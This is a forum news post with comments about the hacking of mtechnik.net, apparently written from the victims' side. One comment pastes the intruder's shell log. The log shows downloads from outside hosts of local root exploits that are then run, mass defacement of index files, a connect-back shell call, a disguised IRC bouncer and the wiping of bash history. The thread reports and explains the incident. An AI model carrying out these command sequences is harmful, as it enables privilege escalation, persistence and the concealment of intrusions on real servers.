|
- Readme First! -
Read and follow the rules, otherwise your posts will be closed |
|
|
|
|
|
There are currently, 678 guest(s) and 0 member(s) that are online.
You are Anonymous user. You can register for free by clicking here |
|
|
|
|
|
|
 cazz writes "
I just wanted you to know ASAP that Mtechnik.net and all other sites on that server closely related and belonging to Mikey have been infiltrated by a hacker.
I posted news on this at: Mythic
Until Mikey gets back from wherever he got to - I do not have further info. It appears to have been a root kit perhaps.
View What The Hacker Did
-CAZZ
Admin / mtechnik.net
Admin Note: For myself, I cannot even bring up his site -- not even thru Google cache."
|
|
Posted on Wednesday, December 10 @ 11:10:18 CET by Zhen-Xjell |
|
|
|
|
| |
|
Average Score: 4.66
Votes: 3
|
|
|
|
|
|
|
| | The comments are owned by the poster. We aren't responsible for their content. |
| | | | |
| No Comments Allowed for Anonymous, please register | | | | |
Re: Hacker on the Loose (Score: 1)
by Daniel-cmw on Wednesday, December 10 @ 11:13:10 CET
(User Info | Send a Message) | Just because the page is only half loaded doesnt really mean its been hacked.
It could be anything, server error, theme problems, addon corrupt.. anything..
Unless you can come up with the logs to show whath the 'hacker' did. |
| | | | |
Re: Hacker on the Loose (Score: 1)
by VIPixel on Wednesday, December 10 @ 13:28:56 CET
(User Info | Send a Message) | Me and Mikey have no idea yet what port they used to inject this trojan, but they attacked while mikey setting up the server for security, just moving to a new server for few hours!! shame hacker!
the attack method are mass defacement by injecting a trojan, replacing some binaries and creating root access:
uid 0 account (techteam) - BAD!
just like w00t exploit but i'm not sure, have no chance to deep dig the logs
when this kid attacking, the server lags very bad,
guess what? they search all index.* on the hardrive and echo with their index.* content
which mean every index.* on / has been replaced
including the cpanel themes
Mikey is not shutting down the server but the Tech guy does to restore the server, we can't do anything but damn waiting till its fix!
hope ya'll understand this situation.
to find out what is mass defacement:
http://www.zone-h.org
screenshot:
http://205.214.71.150/hacked.jpg
Brumie and Mikey |
| | | | |
Re: Hacker on the Loose (Score: 1)
by kwality on Wednesday, December 10 @ 15:43:00 CET
(User Info | Send a Message) | Ive been look around for some info on this "kernel panic" trojan and came up with this. There is also a fix if this is indeed the problem.
http://www.securiteam.com/unixfocus/6R0001F8VG.html
Hope this helps cazz.
-Ollie- |
| | | | |
Re: Hacker on the Loose (Score: 1)
by Mtechnik on Thursday, December 11 @ 03:23:51 CET
(User Info | Send a Message) http://www.mtechnik.net | well first thanks for the support guys. to clearify some things. my server was hacked, yes. The hacker got access by ssh telnet, here is one log
ls
./pt
./kmod
./own
./klogd
./kmod
rm kmod
rm -rf kmod
wget www.viperhaxu.hpg.com.br/ptrace
chmod ptrace
chmod 777 ptrace
./ptrace
wget www.skater0x.hpg.com.br/local/kmod
chmod 777 kmod.1
./kmod.1
./newlocal
gcc fedor.c -o fedor
ls
./f
uname -a
chmod 777 f
./f
id
pwd
wget www.skater0x.hpg.com.br/xpll/cancer
echo SU3D OWNZ > index.txt
chmod 777 cancer
./cancer index.txt
ls
rm bind.txt
ls -la
cat .bash_history
ls
./kmod
./cbd
./cbd 10.28.88.142
cat fedor.c
./f
./ptrace
c
./pt
z
ls
ls
./setuid
id
./ptrace
./own
./ptrace
wget www.creatividade.hpg.com.br/locals
chmod 777 locals
./locals
./locals
./locals
rm -rf locals
ls
./ptrace
echo lol >.bash_history
ls
./td
id
./pt
id
./td
ls
w
id
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
wget thecoreteam.home.ro/pt
chmod +x pt
./pt
./pt
./pt
./pt
./pt
wget www.geocities.com/sorin_smen/psybnc.tgz
ls
rm -rf *
cd ..
ls
rm -rf *
ls
./newlocal
./localroot
./own
./kmod
rm -rf *
chmod +wrx setuid
id
ls -all
ls
rm -rf sess_fc187590539417321dd72b37686e7e27
cd www.geocities.com/sorin_smen/psybnc.tgz
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
wget www.geocities.com/sorin_smen/psybnc.tgz
tar zxvf psybnc.tgz
cd psybnc
./psybnc
kill -9 32751
rm -rf psybnc.conf
wget thecoreteam.home.ro/psybnc.conf
mv psybnc "squid -D"
./"squid -D"
exit
id
./km
ls
ls -al km
./km
./km
./km;./km;./km
exit
thats just one there is plenty more. As for server not load, well i decided to shut the whole server down, that hacker pic was just too annoying. |
| | | | |
Re: Hacker on the Loose (Score: 1)
by VinDSL on Thursday, December 11 @ 04:46:34 CET
(User Info | Send a Message) http://www.lenon.com/ | Hey, Mtechnik, did your site receive the following defacement?
"yeah! i am from brasil! r0x a lot
“Todas as noites eu “conecto” com o intuito de poder desabafar o Maximo, ate me cansar para então, o sono chegar, e levar-me para a cama.Tento imaginar o futuro todo santo dia, e o único futuro que desejo observar, é a solução da dor que me consome sem pressa para acabar.A solidão realmente gostou da minha pessoa.Gostou tanto que resolveram me visitar todas as noites.E sempre muito mal educada, pois chega, sem avisar, e sem pressa para acabar as suas pressões psicológicas.
Mas a solidão não contava em encontrar um cara tão maluco como ela.Pois sou um hacker, e a rede me trouxe felicidade.Felicidade de saber que a solidão não me faria chorar de desgosto, e cair em suas tentações e infelicidades.a rede com suas fantasias e mistérios,numa conectada me traz tesão,me faz ter desejo,me faz forte e quente,me faz chorar e rir,me faz ter vontade de correr,vontade de gritar,de amar,vontade de viver e esquecer tudo.é uma força que dificilmente conseguiríamos sozinhos,é um amigo para todos os problemas,é uma janela para um mundo quente,lento e misterioso.Todo tem seu por que, eu tenho o meu, você com certeza, deve ter o seu.Muitos acham isso uma loucura.Loucura é a minha vida..........HACKER!”"
Blah, blah and blah... |
| | | | | |
